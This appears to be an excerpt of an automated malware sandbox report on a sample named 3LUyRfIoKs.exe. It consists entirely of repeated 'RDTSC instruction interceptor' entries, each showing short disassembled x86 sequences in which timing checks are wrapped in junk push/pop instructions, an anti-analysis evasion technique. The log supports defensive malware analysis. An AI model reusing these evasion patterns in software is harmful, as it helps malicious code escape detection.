                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA12E2 second address: CA1313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F2830CEE571h 0x0000000e lea eax, dword ptr [ebp+1247C03Fh] 0x00000014 mov dword ptr [ebp+122D20F4h], edx 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jns 00007F2830CEE566h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA13DE second address: CA13E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA14B4 second address: CA14BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA17DE second address: AF8C5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2830CF2D28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007F2830CF2D39h 0x00000010 mov dl, ah 0x00000012 pop ecx 0x00000013 or edx, dword ptr [ebp+122D3780h] 0x00000019 push dword ptr [ebp+122D0089h] 0x0000001f cmc 0x00000020 call dword ptr [ebp+122D2263h] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D2226h], edi 0x0000002d xor eax, eax 0x0000002f cld 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 pushad 0x00000035 mov cl, 35h 0x00000037 push ecx 0x00000038 mov di, 8E28h 0x0000003c pop edi 0x0000003d popad 0x0000003e mov dword ptr [ebp+122D3B18h], eax 0x00000044 pushad 0x00000045 jmp 00007F2830CF2D2Ch 0x0000004a pushad 0x0000004b push ecx 0x0000004c pop esi 0x0000004d mov dword ptr [ebp+122D2226h], esi 0x00000053 popad 0x00000054 popad 0x00000055 mov esi, 0000003Ch 0x0000005a mov dword ptr [ebp+122D1DBDh], ecx 0x00000060 add dword ptr [ebp+122D32A6h], ecx 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a stc 0x0000006b lodsw 0x0000006d stc 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F2830CF2D2Bh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b stc 0x0000007c nop 0x0000007d push edi 0x0000007e push eax 0x0000007f push edx 0x00000080 ja 00007F2830CF2D26h 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA18C1 second address: CA18C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA18C7 second address: CA18CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA18CB second address: CA18CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA18CF second address: AF8C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push dword ptr [ebp+122D0089h] 0x0000000f jc 00007F2830CF2D2Ch 0x00000015 mov dword ptr [ebp+122D1CFBh], ebx 0x0000001b call dword ptr [ebp+122D2263h] 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D2226h], edi 0x00000028 xor eax, eax 0x0000002a cld 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f pushad 0x00000030 mov cl, 35h 0x00000032 push ecx 0x00000033 mov di, 8E28h 0x00000037 pop edi 0x00000038 popad 0x00000039 mov dword ptr [ebp+122D3B18h], eax 0x0000003f pushad 0x00000040 jmp 00007F2830CF2D2Ch 0x00000045 pushad 0x00000046 push ecx 0x00000047 pop esi 0x00000048 mov dword ptr [ebp+122D2226h], esi 0x0000004e popad 0x0000004f popad 0x00000050 mov esi, 0000003Ch 0x00000055 mov dword ptr [ebp+122D1DBDh], ecx 0x0000005b add dword ptr [ebp+122D32A6h], ecx 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 stc 0x00000066 lodsw 0x00000068 stc 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jmp 00007F2830CF2D2Bh 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 stc 0x00000077 nop 0x00000078 push edi 0x00000079 push eax 0x0000007a push edx 0x0000007b ja 00007F2830CF2D26h 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1935 second address: CA1939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1B51 second address: CA1B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1D49 second address: CA1D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1EC3 second address: CA1ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1ECE second address: CA1F30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F2830CEE568h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 movzx ecx, ax 0x00000026 pushad 0x00000027 movsx ebx, dx 0x0000002a stc 0x0000002b popad 0x0000002c push 00000004h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F2830CEE568h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 nop 0x00000049 push edi 0x0000004a jne 00007F2830CEE56Ch 0x00000050 pop edi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pop edx 0x00000057 pop eax 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1F30 second address: CA1F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2830CF2D26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1F3A second address: CA1F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA221A second address: CA221E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA221E second address: CA2263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov cx, 7998h 0x0000000e push 0000001Eh 0x00000010 jg 00007F2830CEE572h 0x00000016 jg 00007F2830CEE56Ch 0x0000001c mov edx, dword ptr [ebp+122D3635h] 0x00000022 nop 0x00000023 jmp 00007F2830CEE578h 0x00000028 push eax 0x00000029 push ebx 0x0000002a jo 00007F2830CEE56Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA2619 second address: CA2658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007F2830CF2D34h 0x00000011 pop esi 0x00000012 pushad 0x00000013 jmp 00007F2830CF2D2Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA2658 second address: CA2693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jno 00007F2830CEE56Ch 0x0000000d lea eax, dword ptr [ebp+1247C083h] 0x00000013 jnl 00007F2830CEE569h 0x00000019 movsx edx, di 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F2830CEE576h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA2718 second address: CA271C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA271C second address: C828CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnc 00007F2830CEE572h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F2830CEE568h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2F5Dh], ebx 0x0000002f call dword ptr [ebp+122D1C6Ah] 0x00000035 push edx 0x00000036 pushad 0x00000037 push ebx 0x00000038 pop ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C828CB second address: C828FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 ja 00007F2830CF2D2Eh 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F2830CF2D39h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD32A second address: CCD34B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F2830CEE56Ah 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F2830CEE56Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD34B second address: CCD353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD353 second address: CCD359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD4D1 second address: CCD4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD80F second address: CCD813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD813 second address: CCD81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD81E second address: CCD82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD82B second address: CCD837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD837 second address: CCD83D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C828DC second address: C828FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F2830CF2D39h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD7A1B second address: CD7A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C624C0 second address: C624C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C624C7 second address: C624D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C624D2 second address: C624E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD642C second address: CD6432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD66F6 second address: CD671B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2830CF2D2Eh 0x00000008 jnc 00007F2830CF2D2Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD671B second address: CD6721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD6721 second address: CD6725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD689B second address: CD68A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2830CEE566h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD6CCA second address: CD6CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D38h 0x00000007 jmp 00007F2830CF2D2Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD6E44 second address: CD6E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F2830CEE570h 0x0000000e jc 00007F2830CEE566h 0x00000014 jmp 00007F2830CEE573h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD72EA second address: CD72F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD72F5 second address: CD732E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CEE579h 0x00000009 jbe 00007F2830CEE566h 0x0000000f popad 0x00000010 jmp 00007F2830CEE56Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD732E second address: CD7332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDAC30 second address: CDAC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F2830CEE566h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDAC3D second address: CDAC5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F2830CF2D26h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F2830CF2D28h 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007F2830CF2D26h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDAC5D second address: CDAC72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE571h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDAC72 second address: CDAC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDF379 second address: CDF37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDF37D second address: CDF381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDF4E6 second address: CDF503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F2830CEE575h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDF503 second address: CDF520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b popad 0x0000000c jl 00007F2830CF2D3Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDF6BC second address: CDF6C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDF6C1 second address: CDF6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDF6C7 second address: CDF6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2830CEE566h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDF6D3 second address: CDF6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F2830CF2D2Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDFDAD second address: CDFDB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDFDB1 second address: CDFDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDFDB7 second address: CDFDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F2830CEE568h 0x0000000c pushad 0x0000000d jg 00007F2830CEE566h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDFDCE second address: CDFDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CF2D33h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDFDE7 second address: CDFDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CDFDF2 second address: CDFDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CE00CD second address: CE00E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F2830CEE56Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CE3804 second address: CE3808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CE3514 second address: CE3518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CE5DE8 second address: CE5DEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CE5918 second address: CE591E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CE591E second address: CE5939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2830CF2D32h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CE9F48 second address: CE9F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CE9F4C second address: CE9F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2830CF2D2Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEA214 second address: CEA22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2830CEE56Dh 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEA22D second address: CEA249 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2830CF2D2Bh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEA53D second address: CEA543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEA543 second address: CEA556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F2830CF2D26h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEA556 second address: CEA596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2830CEE56Ah 0x00000008 jg 00007F2830CEE566h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 jmp 00007F2830CEE572h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2830CEE574h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CEA596 second address: CEA59C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
